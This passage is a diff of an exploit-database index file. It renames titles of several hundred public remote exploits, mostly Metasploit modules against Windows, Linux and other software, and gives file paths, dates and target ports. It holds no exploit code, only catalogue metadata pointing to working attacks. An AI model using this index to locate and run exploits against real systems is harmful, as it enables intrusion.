ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 @@ -10679,7 +10688,7 @@ id,file,description,date,author,platform,type,port 16647,platforms/windows/remote/16647.rb,"EMC ApplicationXtender (KeyWorks) - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16649,platforms/windows/remote/16649.rb,"Microsoft Works 7 - 'WkImgSrv.dll' WKsPictureInterface() ActiveX Exploit (Metasploit)",2010-09-25,Metasploit,windows,remote,0 16685,platforms/windows/remote/16685.rb,"MOXA MediaDBPlayback - ActiveX Control Buffer Overflow (Metasploit)",2010-11-05,Metasploit,windows,remote,0 -16689,platforms/windows/remote/16689.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow (2) (Metasploit)",2010-04-30,Metasploit,windows,remote,23 +16689,platforms/windows/remote/16689.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) (2)",2010-04-30,Metasploit,windows,remote,23 16690,platforms/windows/remote/16690.rb,"QBik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,80 16691,platforms/windows/remote/16691.rb,"Blue Coat WinProxy - Host Header Overflow (Metasploit)",2010-07-12,Metasploit,windows,remote,80 16692,platforms/windows/remote/16692.rb,"Proxy-Pro Professional GateKeeper 4.7 - GET Request Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,3128 @@ -10688,9 +10697,9 @@ id,file,description,date,author,platform,type,port 16695,platforms/windows/remote/16695.rb,"Medal of Honor Allied Assault - getinfo Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,12203 16696,platforms/windows/remote/16696.rb,"IBM Lotus Domino Sametime - STMux.exe Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,1533 16697,platforms/windows/remote/16697.rb,"IBM Lotus Domino Web Server - Accept-Language Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,80 -16698,platforms/windows/remote/16698.rb,"Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)",2010-09-20,Metasploit,windows,remote,0 -16699,platforms/windows/remote/16699.rb,"Outlook - ATTACH_BY_REF_RESOLVE File Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0 -16700,platforms/windows/remote/16700.rb,"Outlook - ATTACH_BY_REF_ONLY File Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0 +16698,platforms/windows/remote/16698.rb,"Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) (MS07-017) (Metasploit)",2010-09-20,Metasploit,windows,remote,0 +16699,platforms/windows/remote/16699.rb,"Microsoft Outlook - ATTACH_BY_REF_RESOLVE File Execution (MS10-045) (Metasploit)",2010-09-20,Metasploit,windows,remote,0 +16700,platforms/windows/remote/16700.rb,"Microsoft Outlook - ATTACH_BY_REF_ONLY File Execution (MS10-045) (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16701,platforms/windows/remote/16701.rb,"MySQL yaSSL (Windows) - SSL Hello Message Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,3306 16702,platforms/windows/remote/16702.rb,"KarjaSoft Sami FTP Server 2.0.2 - USER Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,21 16703,platforms/windows/remote/16703.rb,"GlobalScape Secure FTP Server - Input Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 @@ -10706,7 +10715,7 @@ id,file,description,date,author,platform,type,port 16713,platforms/windows/remote/16713.rb,"CesarFTP 0.99g - (MKD) Command Buffer Overflow (Metasploit)",2011-02-23,Metasploit,windows,remote,0 16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,2100 16715,platforms/windows/remote/16715.rb,"RhinoSoft Serv-U FTPd Server - MDTM Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,21 -16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST)",2010-11-14,Metasploit,windows,remote,0 +16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST) (Metasploit)",2010-11-14,Metasploit,windows,remote,0 16717,platforms/windows/remote/16717.rb,"Ipswitch WS_FTP Server 5.05 - (XMD5) Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16718,platforms/windows/remote/16718.rb,"Xlink FTP Server - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16719,platforms/windows/remote/16719.rb,"Ipswitch WS_FTP Server 5.03 - MKD Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,21 @@ -10715,14 +10724,14 @@ id,file,description,date,author,platform,type,port 16722,platforms/windows/remote/16722.rb,"Xlink FTP Client - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16723,platforms/windows/remote/16723.rb,"Vermillion FTP Daemon - PORT Command Memory Corruption (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16724,platforms/windows/remote/16724.rb,"War-FTPD 1.65 - 'Username' Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 -16725,platforms/windows/remote/16725.rb,"FTPGetter Standard 3.55.0.05 - Stack Buffer Overflow (PWD)",2010-11-14,Metasploit,windows,remote,0 +16725,platforms/windows/remote/16725.rb,"FTPGetter Standard 3.55.0.05 - Stack Buffer Overflow (PWD) (Metasploit)",2010-11-14,Metasploit,windows,remote,0 16726,platforms/windows/remote/16726.rb,"FTPPad 1.2.0 - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0 16727,platforms/windows/remote/16727.rb,"Sasser Worm avserve - FTP PORT Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,5554 16728,platforms/windows/remote/16728.rb,"Gekko Manager FTP Client - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0 16729,platforms/windows/remote/16729.rb,"SlimFTPd - LIST Concatenation Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP Server - 'Username' Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16731,platforms/win_x86/remote/16731.rb,"Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit)",2010-04-30,Metasploit,win_x86,remote,0 -16732,platforms/windows/remote/16732.rb,"httpdx - tolog() Function Format String (1)",2010-08-25,Metasploit,windows,remote,0 +16732,platforms/windows/remote/16732.rb,"httpdx - tolog() Function Format String (Metasploit) (1)",2010-08-25,Metasploit,windows,remote,0 16733,platforms/windows/remote/16733.rb,"FileCOPA FTP Server (Pre 18 Jul Version) - Exploit (Metasploit)",2010-04-30,Metasploit,windows,remote,21 16734,platforms/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 - LIST Command Stack Buffer Overflow (Metasploit)",2010-08-03,Metasploit,windows,remote,0 16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - USER Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 @@ -10730,17 +10739,17 @@ id,file,description,date,author,platform,type,port 16737,platforms/windows/remote/16737.rb,"EasyFTP Server 1.7.0.11 - CWD Command Stack Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16738,platforms/windows/remote/16738.rb,"AASync 2.2.1.0 (Windows x86) - Stack Buffer Overflow 'LIST' (Metasploit)",2010-11-14,Metasploit,windows,remote,0 16739,platforms/windows/remote/16739.rb,"Xftp FTP Client 3.0 - PWD Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,21 -16740,platforms/windows/remote/16740.rb,"Microsoft IIS FTP Server - NLST Response Overflow (Metasploit)",2010-11-12,Metasploit,windows,remote,21 +16740,platforms/windows/remote/16740.rb,"Microsoft IIS FTP Server - NLST Response Overflow (MS09-053) (Metasploit)",2010-11-12,Metasploit,windows,remote,21 16741,platforms/windows/remote/16741.rb,"Texas Imperial Software WFTPD 3.23 - SIZE Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 16742,platforms/windows/remote/16742.rb,"Easy File Sharing FTP Server 2.0 - PASS Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16743,platforms/windows/remote/16743.rb,"32bit FTP Client - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0 16744,platforms/windows/remote/16744.rb,"Computer Associates License Client - GETCONFIG Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,10203 16745,platforms/windows/remote/16745.rb,"Computer Associates License Server - GETCONFIG Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,10202 16746,platforms/windows/remote/16746.rb,"Sentinel LM - UDP Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,5093 -16747,platforms/windows/remote/16747.rb,"Microsoft Message Queueing Service - Path Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,2103 -16748,platforms/windows/remote/16748.rb,"Microsoft DNS RPC Service - extractQuotedChar() Overflow (TCP)",2010-07-25,Metasploit,windows,remote,0 -16749,platforms/windows/remote/16749.rb,"Microsoft RPC DCOM Interface - Overflow Exploit (Metasploit)",2011-01-11,Metasploit,windows,remote,0 -16750,platforms/windows/remote/16750.rb,"Microsoft Message Queueing Service - DNS Name Path Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote,0 +16747,platforms/windows/remote/16747.rb,"Microsoft Message Queueing Service - Path Overflow (MS05-017) (Metasploit)",2010-05-09,Metasploit,windows,remote,2103 +16748,platforms/windows/remote/16748.rb,"Microsoft DNS RPC Service - extractQuotedChar() TCP Overflow (MS07-029) (Metasploit)",2010-07-25,Metasploit,windows,remote,0 +16749,platforms/windows/remote/16749.rb,"Microsoft RPC DCOM Interface - Overflow Exploit (MS03-026) (Metasploit)",2011-01-11,Metasploit,windows,remote,0 +16750,platforms/windows/remote/16750.rb,"Microsoft Message Queueing Service - DNS Name Path Overflow (MS07-065) (Metasploit)",2010-07-25,Metasploit,windows,remote,0 16751,platforms/win_x86/remote/16751.rb,"SHOUTcast DNAS/Win32 1.9.4 - File Request Format String Overflow (Metasploit)",2010-04-30,Metasploit,win_x86,remote,0 16752,platforms/windows/remote/16752.rb,"Apache (mod_rewrite) - LDAP protocol Buffer Overflow (Metasploit)",2010-02-15,Metasploit,windows,remote,80 16753,platforms/windows/remote/16753.rb,"Xitami Web Server 2.5c2 - If-Modified-Since Overflow (Metasploit)",2010-08-25,Metasploit,windows,remote,80 @@ -10754,7 +10763,7 @@ id,file,description,date,author,platform,type,port 16761,platforms/windows/remote/16761.rb,"BadBlue 2.5 - 'ext.dll' Buffer Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,80 16762,platforms/windows/remote/16762.rb,"BEA WebLogic - JSESSIONID Cookie Value Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,80 16763,platforms/win_x86/remote/16763.rb,"Icecast 2.0.1 (Windows x86) - Header Overwrite (Metasploit)",2010-04-30,Metasploit,win_x86,remote,8000 -16764,platforms/windows/remote/16764.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (2)",2010-05-09,Metasploit,windows,remote,0 +16764,platforms/windows/remote/16764.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (Metasploit) (2)",2010-05-09,Metasploit,windows,remote,0 16765,platforms/windows/remote/16765.rb,"MaxDB WebDBM - Database Parameter Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,9999 16766,platforms/windows/remote/16766.rb,"Sybase EAServer 5.2 - Remote Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,8080 16767,platforms/windows/remote/16767.rb,"IA WebMail Server 3.x - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,80 @@ -10774,7 +10783,7 @@ id,file,description,date,author,platform,type,port 16781,platforms/windows/remote/16781.rb,"MailEnable - Authorisation Header Buffer Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,0 16782,platforms/windows/remote/16782.rb,"Apache (Windows x86) - (Windows x86) Chunked Encoding (Metasploit)",2010-07-07,Metasploit,windows,remote,0 16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot - Overflow Exploit (Metasploit)",2010-09-20,Metasploit,win_x86,remote,0 -16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (1)",2010-11-22,Metasploit,multiple,remote,80 +16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (1)",2010-11-22,Metasploit,multiple,remote,80 16785,platforms/windows/remote/16785.rb,"Hewlett-Packard (HP) Power Manager Administration - Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,80 16786,platforms/windows/remote/16786.rb,"PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,7144 16787,platforms/windows/remote/16787.rb,"IPSwitch WhatsUp Gold 8.03 - Buffer Overflow (Metasploit)",2010-07-14,Metasploit,windows,remote,0 @@ -10782,7 +10791,7 @@ id,file,description,date,author,platform,type,port 16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM - GET Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,9999 16792,platforms/windows/remote/16792.rb,"HP OpenView Network Node Manager - OvWebHelp.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16793,platforms/windows/remote/16793.rb,"Amlibweb NetOpacs - 'webquery.dll' Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,80 -16794,platforms/windows/remote/16794.rb,"httpdx - tolog() Function Format String (2)",2010-08-25,Metasploit,windows,remote,80 +16794,platforms/windows/remote/16794.rb,"httpdx - tolog() Function Format String (Metasploit) (2)",2010-08-25,Metasploit,windows,remote,80 16795,platforms/cgi/remote/16795.rb,"HP OpenView Network Node Manager - Toolbar.exe CGI Buffer Overflow (Metasploit)",2010-05-09,Metasploit,cgi,remote,0 16796,platforms/windows/remote/16796.rb,"BEA Weblogic - Transfer-Encoding Buffer Overflow (Metasploit)",2010-07-08,Metasploit,windows,remote,80 16797,platforms/windows/remote/16797.rb,"HP OpenView Network Node Manager (OV NNM) - ovalarm.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 @@ -10808,7 +10817,7 @@ id,file,description,date,author,platform,type,port 16817,platforms/windows/remote/16817.rb,"GoodTech Telnet Server 5.0.6 - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,2380 16818,platforms/windows/remote/16818.rb,"YahooPOPs (YPOPS) 0.6 - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,25 16819,platforms/windows/remote/16819.rb,"SoftiaCom wMailServer 1.0 - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,25 -16820,platforms/windows/remote/16820.rb,"Exchange 2000 - XEXCH50 Heap Overflow (MS03-046)",2010-11-11,Metasploit,windows,remote,25 +16820,platforms/windows/remote/16820.rb,"Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (MS03-046) (Metasploit)",2010-11-11,Metasploit,windows,remote,25 16821,platforms/windows/remote/16821.rb,"Mercury/32 Mail SMTPD - AUTH CRAM-MD5 Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,25 16822,platforms/windows/remote/16822.rb,"TABS MailCarrier 2.51 - SMTP EHLO Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,25 16823,platforms/windows/remote/16823.rb,"Network Associates PGP KeyServer 7 - LDAP Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,389 @@ -10826,7 +10835,7 @@ id,file,description,date,author,platform,type,port 16835,platforms/linux/remote/16835.rb,"Madwifi - SIOCGIWSCAN Buffer Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0 16836,platforms/linux/remote/16836.rb,"Cyrus IMAPD - pop3d popsubfolders USER Buffer Overflow (Metasploit)",2010-04-30,Metasploit,linux,remote,0 16837,platforms/linux/remote/16837.rb,"hplip - hpssd.py From Address Arbitrary Command Execution (Metasploit)",2010-10-09,Metasploit,linux,remote,0 -16838,platforms/linux/remote/16838.rb,"NetSupport Manager Agent - Remote Buffer Overflow (2)",2011-03-03,Metasploit,linux,remote,0 +16838,platforms/linux/remote/16838.rb,"NetSupport Manager Agent - Remote Buffer Overflow (Metasploit) (2)",2011-03-03,Metasploit,linux,remote,0 16839,platforms/linux/remote/16839.rb,"Borland Interbase - PWD_db_aliased() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 16840,platforms/linux/remote/16840.rb,"Borland Interbase - open_marker_file() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 16841,platforms/linux/remote/16841.rb,"Salim Gasmi GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 @@ -10847,13 +10856,13 @@ id,file,description,date,author,platform,type,port 16859,platforms/linux/remote/16859.rb,"Samba (Linux) - lsa_io_trans_names Heap Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0 16860,platforms/linux/remote/16860.rb,"Samba (Linux/x86) - chain_reply Memory Corruption (Metasploit)",2010-09-04,Metasploit,linux,remote,0 16861,platforms/linux/remote/16861.rb,"Samba (Linux x86) - trans2open Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0 -16862,platforms/hardware/remote/16862.rb,"Apple iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (1)",2010-09-20,Metasploit,hardware,remote,0 +16862,platforms/hardware/remote/16862.rb,"Apple iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,hardware,remote,0 16863,platforms/osx/remote/16863.rb,"AppleFileServer (OSX) - LoginExt PathName Overflow (Metasploit)",2010-09-20,Metasploit,osx,remote,0 16864,platforms/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client (OSX) - Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0 16865,platforms/osx/remote/16865.rb,"Knox Arkeia Backup Client Type 77 (OSX) - Overflow Exploit (Metasploit)",2010-05-09,Metasploit,osx,remote,0 16866,platforms/unix/remote/16866.rb,"Apple Safari - Archive Metadata Command Execution (Metasploit)",2010-09-20,Metasploit,unix,remote,0 16867,platforms/osx/remote/16867.rb,"Apple Mac OSX Software Update - Command Execution (Metasploit)",2010-09-20,Metasploit,osx,remote,0 -16868,platforms/hardware/remote/16868.rb,"Apple iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (2)",2010-09-20,Metasploit,hardware,remote,0 +16868,platforms/hardware/remote/16868.rb,"Apple iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (Metasploit) (2)",2010-09-20,Metasploit,hardware,remote,0 16869,platforms/hardware/remote/16869.rb,"iPhone MobileMail - LibTIFF Buffer Overflow (Metasploit)",2010-09-20,Metasploit,hardware,remote,0 16870,platforms/multiple/remote/16870.rb,"Apple Mail.app - Image Attachment Command Execution (Metasploit)",2011-03-05,Metasploit,multiple,remote,0 16871,platforms/osx/remote/16871.rb,"Apple Mac OSX - mDNSResponder UPnP Location Overflow (Metasploit)",2011-01-08,Metasploit,osx,remote,0 @@ -10867,7 +10876,7 @@ id,file,description,date,author,platform,type,port 16879,platforms/freebsd/remote/16879.rb,"Xtacacsd 4.1.2 - report() Buffer Overflow (Metasploit) (2)",2010-05-09,Metasploit,freebsd,remote,0 16880,platforms/linux/remote/16880.rb,"Samba (*BSD x86) - trans2open Overflow Exploit (Metasploit)",2010-06-17,Metasploit,linux,remote,0 16887,platforms/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0 -16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP)",2010-08-25,Metasploit,linux,remote,0 +16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,linux,remote,0 16903,platforms/php/remote/16903.rb,"OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution (Metasploit)",2010-09-20,Metasploit,php,remote,0 16910,platforms/linux/remote/16910.rb,"Mitel Audio and Web Conferencing - Command Injection (Metasploit)",2011-01-08,Metasploit,linux,remote,0 16915,platforms/linux/remote/16915.rb,"Oracle VM Server Virtual Server Agent - Command Injection (Metasploit)",2010-10-25,Metasploit,linux,remote,0 @@ -10882,7 +10891,7 @@ id,file,description,date,author,platform,type,port 16926,platforms/windows/remote/16926.rb,"Mercantec SoftCart - CGI Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16927,platforms/hp-ux/remote/16927.rb,"HP-UX LPD - Command Execution (Metasploit)",2010-10-06,Metasploit,hp-ux,remote,0 16928,platforms/linux/remote/16928.rb,"System V Derived /bin/login - Extraneous Arguments Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 -16930,platforms/aix/remote/16930.rb,"ToolTalk - rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)",2010-11-11,Metasploit,aix,remote,0 +16930,platforms/aix/remote/16930.rb,"ToolTalk - rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX) (Metasploit)",2010-11-11,Metasploit,aix,remote,0 16936,platforms/windows/remote/16936.html,"KingView 6.5.3 SCADA - ActiveX Exploit",2011-03-07,"Carlos Mario Penagos Hollmann",windows,remote,0 16956,platforms/windows/remote/16956.rb,"Novell iPrint Client 5.52 - ActiveX Control Buffer Overflow (Metasploit)",2011-03-07,Metasploit,windows,remote,0 16957,platforms/windows/remote/16957.rb,"Oracle MySQL for Microsoft Windows - Payload Execution (Metasploit)",2011-03-08,Metasploit,windows,remote,0 @@ -10928,7 +10937,7 @@ id,file,description,date,author,platform,type,port 17156,platforms/windows/remote/17156.txt,"OpenText FirstClass Client 11.005 - Code Execution",2011-04-12,"Kyle Ossinger",windows,remote,0 17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 - SWF Memory Corruption (Metasploit)",2011-04-16,Metasploit,windows,remote,0 17187,platforms/windows/remote/17187.txt,"Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (ASLR + DEP Bypass)",2011-04-19,Abysssec,windows,remote,0 -17195,platforms/windows/remote/17195.rb,"Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (2)",2011-04-19,Metasploit,windows,remote,0 +17195,platforms/windows/remote/17195.rb,"Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (Metasploit) (2)",2011-04-19,Metasploit,windows,remote,0 17199,platforms/unix/remote/17199.rb,"Spreecommerce < 0.50.0 - Arbitrary Command Execution (Metasploit)",2011-04-21,Metasploit,unix,remote,0 17219,platforms/windows/remote/17219.rb,"EMC HomeBase Server - Directory Traversal Remote Code Execution (Metasploit)",2011-04-27,Metasploit,windows,remote,18821 17243,platforms/windows/remote/17243.txt,"SPlayer 3.7 (build 2055) - Buffer Overflow",2011-05-04,xsploitedsec,windows,remote,0 @@ -10957,7 +10966,7 @@ id,file,description,date,author,platform,type,port 17381,platforms/windows/remote/17381.txt,"simple Web-Server 1.2 - Directory Traversal",2011-06-10,"AutoSec Tools",windows,remote,0 17456,platforms/windows/remote/17456.rb,"Citrix Provisioning Services 5.6 - streamprocess.exe Buffer Overflow (Metasploit)",2011-06-27,Metasploit,windows,remote,0 17392,platforms/windows/remote/17392.rb,"IBM Tivoli Endpoint Manager - POST Query Buffer Overflow (Metasploit)",2011-06-12,Metasploit,windows,remote,0 -17409,platforms/windows/remote/17409.rb,"Microsoft Internet Explorer - MSHTML!CObjectElement Use-After-Free (MS11-050)",2011-06-17,Metasploit,windows,remote,0 +17409,platforms/windows/remote/17409.rb,"Microsoft Internet Explorer - MSHTML!CObjectElement Use-After-Free (MS11-050) (Metasploit)",2011-06-17,Metasploit,windows,remote,0 17415,platforms/windows/remote/17415.rb,"Black Ice Cover Page SDK - insecure method DownloadImageFileURL() Exploit (Metasploit)",2011-06-20,mr_me,windows,remote,0 17416,platforms/windows/remote/17416.html,"Black Ice Fax Voice SDK 12.6 - Remote Code Execution",2011-06-20,mr_me,windows,remote,0 17417,platforms/windows/remote/17417.rb,"DATAC RealWin SCADA Server 2 - On_FC_CONNECT_FCS_a_FILE Buffer Overflow (Metasploit)",2011-06-20,Metasploit,windows,remote,0 @@ -10969,7 +10978,7 @@ id,file,description,date,author,platform,type,port 17434,platforms/windows/remote/17434.rb,"RealWin SCADA Server - DATAC Login Buffer Overflow (Metasploit)",2011-06-22,Metasploit,windows,remote,0 17438,platforms/windows/remote/17438.txt,"IBM Web Application Firewall - Bypass Exploit",2011-06-23,"Trustwave's SpiderLabs",windows,remote,0 17450,platforms/windows/remote/17450.rb,"Siemens FactoryLink 8 - CSService Logging Path Parameter Buffer Overflow (Metasploit)",2011-06-25,Metasploit,windows,remote,0 -17448,platforms/windows/remote/17448.rb,"Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview (.lzh attachment)",2011-06-23,Metasploit,windows,remote,0 +17448,platforms/windows/remote/17448.rb,"Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview ('.lzh' Attachment) (Metasploit)",2011-06-23,Metasploit,windows,remote,0 17460,platforms/windows/remote/17460.pl,"Kaillera - Multiple Clients Buffer Overflow Vulnerabilities",2011-06-30,Sil3nt_Dre4m,windows,remote,0 17462,platforms/freebsd/remote/17462.txt,"FreeBSD OpenSSH 3.5p1 - Remote Root Exploit",2011-06-30,kingcope,freebsd,remote,0 17467,platforms/windows/remote/17467.rb,"HP - OmniInet.exe Opcode 27 Buffer Overflow (Metasploit)",2011-07-01,Metasploit,windows,remote,5555 @@ -10983,7 +10992,7 @@ id,file,description,date,author,platform,type,port 17513,platforms/windows/remote/17513.rb,"Blue Coat Authentication and Authorization Agent (BCAAA) 5 - Buffer Overflow (Metasploit)",2011-07-09,Metasploit,windows,remote,0 17517,platforms/windows/remote/17517.txt,"Symantec Backup Exec 12.5 - MiTM Attack",2011-07-09,Nibin,windows,remote,0 17519,platforms/windows/remote/17519.py,"Freefloat FTP Server - 'LIST' Command Buffer Overflow",2011-07-10,"Zer0 Thunder",windows,remote,0 -17520,platforms/windows/remote/17520.rb,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer (1)",2011-07-10,Metasploit,windows,remote,0 +17520,platforms/windows/remote/17520.rb,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer (Metasploit) (1)",2011-07-10,Metasploit,windows,remote,0 17527,platforms/windows/remote/17527.py,"Solar FTP Server 2.1.1 - PASV Buffer Overflow (PoC)",2011-07-12,"Craig Freyman",windows,remote,0 17535,platforms/multiple/remote/17535.rb,"Java RMI - Server Insecure Default Configuration Java Code Execution (Metasploit)",2011-07-15,Metasploit,multiple,remote,0 17537,platforms/windows/remote/17537.rb,"HP OpenView Network Node Manager - Toolbar.exe CGI Cookie Handling Buffer Overflow (Metasploit)",2011-07-16,Metasploit,windows,remote,0 @@ -11006,9 +11015,9 @@ id,file,description,date,author,platform,type,port 17645,platforms/hardware/remote/17645.py,"iphone/ipad phone drive 1.1.1 - Directory Traversal",2011-08-09,"Khashayar Fereidani",hardware,remote,0 17648,platforms/linux/remote/17648.sh,"HP Data Protector (Linux) - Remote Root Shell",2011-08-10,SZ,linux,remote,0 17649,platforms/windows/remote/17649.py,"BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow",2011-08-10,localh0t,windows,remote,0 -17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 - mChannel Use-After-Free (1)",2011-08-10,Metasploit,windows,remote,0 +17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (1)",2011-08-10,Metasploit,windows,remote,0 17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control 2010.0.0.3 - Trusted Integer Dereference (Metasploit)",2011-08-11,Metasploit,windows,remote,0 -17659,platforms/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026)",2011-08-13,Metasploit,windows,remote,0 +17659,platforms/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026) (Metasploit)",2011-08-13,Metasploit,windows,remote,0 17670,platforms/hardware/remote/17670.py,"Sagem Router Fast 3304/3464/3504 - Telnet Authentication Bypass",2011-08-16,"Elouafiq Ali",hardware,remote,0 17669,platforms/windows/remote/17669.py,"Simple HTTPd 1.42 - PUT Request Remote Buffer Overflow",2011-08-15,nion,windows,remote,0 17672,platforms/windows/remote/17672.html,"Mozilla Firefox 3.6.16 - mChannel Object Use-After-Free Exploit (Windows 7)",2011-08-16,mr_me,windows,remote,0 @@ -11033,12 +11042,12 @@ id,file,description,date,author,platform,type,port 17886,platforms/windows/remote/17886.py,"Freefloat FTP Server - Buffer Overflow (DEP Bypass)",2011-09-23,blake,windows,remote,0 17904,platforms/windows/remote/17904.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (Metasploit)",2011-09-29,otoy,windows,remote,0 17936,platforms/windows/remote/17936.rb,"Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit)",2011-10-06,"Jose A. Vazquez",windows,remote,0 -17948,platforms/windows/remote/17948.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (2)",2011-10-09,Metasploit,windows,remote,0 +17948,platforms/windows/remote/17948.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (Metasploit) 